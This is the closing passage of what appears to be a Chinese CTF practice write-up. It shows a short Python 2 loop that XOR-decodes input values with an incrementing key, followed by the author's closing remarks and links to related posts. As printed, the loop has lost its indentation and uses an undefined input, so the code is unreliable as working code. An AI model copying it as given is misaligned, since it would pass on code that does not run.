j = 1;
s = ""
for i in input:
s += chr(i^j)
j += 1
print s
总的来说收获不小,特别是在写writeup的时候,因为写的比较细所以基本上问题都解决了,付出和收获成正比!!!仅供大家参考如果有更好的方法也希望互相交流!!!祝大家玩得愉快!!!
- 上一篇: 南邮ctf平台部分题解
- 下一篇: 南邮CTF练习题——web题